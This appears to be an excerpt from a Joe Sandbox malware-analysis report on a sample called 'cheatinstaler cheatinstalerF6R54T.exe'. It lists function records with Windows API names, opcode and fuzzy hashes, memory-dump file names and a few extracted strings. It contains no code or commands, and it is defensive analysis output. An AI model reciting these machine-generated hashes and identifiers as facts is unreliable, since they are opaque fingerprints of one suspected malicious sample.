                                                                                  • Instruction Fuzzy Hash: 1921E772E1960186F750AF26D4A43FD73A2EB84B0CFAC8034CA0D4B295CF7E9445C7A0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDeviceRelease
                                                                                  • String ID:
                                                                                  • API String ID: 127614599-3916222277
                                                                                  • Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                  • Instruction ID: 3c46ab8cb446d8135096adc3ce3859340daeb6984bddd91266f60099888ad8a8
                                                                                  • Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                  • Instruction Fuzzy Hash: D9E0C222B4864182FB086BB7B5E903EA261AB4CBD1F598035DA1F43B94CE3CC8C44310
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                                                  • String ID:
                                                                                  • API String ID: 1137671866-0
                                                                                  • Opcode ID: da8e4aee29fe4f38c42170c81f4ee4074902937c75e678a33b987bd9d4a6a6c6
                                                                                  • Instruction ID: a9ca10756cdb156ed29ce379dea103c42a3a0686366c9a2c9f6bf5b855359c27
                                                                                  • Opcode Fuzzy Hash: da8e4aee29fe4f38c42170c81f4ee4074902937c75e678a33b987bd9d4a6a6c6
                                                                                  • Instruction Fuzzy Hash: 57A1B462E18B8281EA10EF66E4E41FDA361FB85784FD85131EA4D07AE9DF3CE544C720
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1452528299-0
                                                                                  • Opcode ID: 54200ff8d853bda438b9724302bbe7c4cb5cd052152846316c4389ee66fe2230
                                                                                  • Instruction ID: 1d121936e5290ddabf0c00dccba84e4921e4d22a617f02d6f5bde12dc02a5038
                                                                                  • Opcode Fuzzy Hash: 54200ff8d853bda438b9724302bbe7c4cb5cd052152846316c4389ee66fe2230
                                                                                  • Instruction Fuzzy Hash: 7C51C372F14A4295FB00EF76D4A42FCA321EB84BD8F984131EA1C577D6DE28D241C360
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1077098981-0
                                                                                  • Opcode ID: c706cd24276746ab5e2fa6f684baf4bd7a284fdc318c0cb51509761d2b1b6963
                                                                                  • Instruction ID: bbbdb1f66f3af03c4e63f7319b4679d1bf544825273690d2b0da4c6a0d658532
                                                                                  • Opcode Fuzzy Hash: c706cd24276746ab5e2fa6f684baf4bd7a284fdc318c0cb51509761d2b1b6963
                                                                                  • Instruction Fuzzy Hash: 24517332618B8286F7509F62E4A47AEF7B4FB84B84F981035EA4D57A54DF3CD504CB60
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 4141327611-0
                                                                                  • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                  • Instruction ID: ea4e854772a42b8ae95c1f7810265dde37a508da70128164a2f5b8fa6ea98131
                                                                                  • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                  • Instruction Fuzzy Hash: 6241B472A0864246F761AF1295E4379EA94FF80BD0F9C8131DB4D46AC5DF6CEA498B20
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3823481717-0
                                                                                  • Opcode ID: 9a9a58264430c11791c0c606b390f78d08ba3037c1fa37d6a31b7cedc8df9908
                                                                                  • Instruction ID: 8608ec7bc72fbe897afb7d95714e91e137e12681b002b0c1e3fd1f4e53a9bc72
                                                                                  • Opcode Fuzzy Hash: 9a9a58264430c11791c0c606b390f78d08ba3037c1fa37d6a31b7cedc8df9908
                                                                                  • Instruction Fuzzy Hash: 3741BF62F14B5285FB00EF76E8A41BC6372BB44BA8F985231EF5D67A99DF38D045C210
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$abort
                                                                                  • String ID:
                                                                                  • API String ID: 1447195878-0
                                                                                  • Opcode ID: a46f80a814de90fc6a6f27f4ba991d7ab4b28824e48526204554d6c2ee2a7ff7
                                                                                  • Instruction ID: 1f969449136f0d058ad26d58255ffb38e1da01cd17e97b88d25cf49f2783a0ad
                                                                                  • Opcode Fuzzy Hash: a46f80a814de90fc6a6f27f4ba991d7ab4b28824e48526204554d6c2ee2a7ff7
                                                                                  • Instruction Fuzzy Hash: 3E014011B0960742FA58BF23A6F5138E292BF447D0F9C4438E91E067D6ED6CBA098330
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDevice$Release
                                                                                  • String ID:
                                                                                  • API String ID: 1035833867-0
                                                                                  • Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                  • Instruction ID: 91b43fafdc7a659ada45a4a00c8a36de7212c07a0b1e439bc29b9a864961cb9d
                                                                                  • Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                  • Instruction Fuzzy Hash: 26E0ED61E4960282FF087F7368F913AA191AF48743F8C4439C81F46750DE3CE5858724
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID: DXGIDebug.dll
                                                                                  • API String ID: 3668304517-540382549
                                                                                  • Opcode ID: 449ae4acbf0ec5e80cc2dc1195a0e30a3ca97b2f1ad0aa9b949921c8a17f74e9
                                                                                  • Instruction ID: fa799af9f8b4e8e103104234f74aacc6e54453ab3072434e3db1c2c23352214d
                                                                                  • Opcode Fuzzy Hash: 449ae4acbf0ec5e80cc2dc1195a0e30a3ca97b2f1ad0aa9b949921c8a17f74e9
                                                                                  • Instruction Fuzzy Hash: 4D71BC72A14B8182EB14DF26E4903ADB3A4FB547D4F984235DBAD07B99DF78E161C310
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID: e+000$gfff
                                                                                  • API String ID: 3215553584-3030954782
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                  • String ID: SIZE
                                                                                  • API String ID: 449872665-3243624926
                                                                                  APIs
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe, xrefs: 00007FF75457C2F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                  • API String ID: 3307058713-2047321637
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Item$Text$Dialog
                                                                                  • String ID: ASKNEXTVOL
                                                                                  • API String ID: 2638039312-3402441367
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide_snwprintf
                                                                                  • String ID: $%s$@%s
                                                                                  • API String ID: 2650857296-834177443
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileHandleType
                                                                                  • String ID: @
                                                                                  • API String ID: 3000768030-2766056989
                                                                                  APIs
                                                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF754571D3E), ref: 00007FF7545740BC
                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF754571D3E), ref: 00007FF754574102
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                  • String ID: csm
                                                                                  • API String ID: 2573137834-1018135373
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF75455E95F,?,?,?,00007FF75455463A,?,?,?), ref: 00007FF75455EA63
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF75455E95F,?,?,?,00007FF75455463A,?,?,?), ref: 00007FF75455EA6E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastObjectSingleWait
                                                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                  • API String ID: 1211598281-2248577382
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindHandleModuleResource
                                                                                  • String ID: RTL
                                                                                  • API String ID: 3537982541-834975271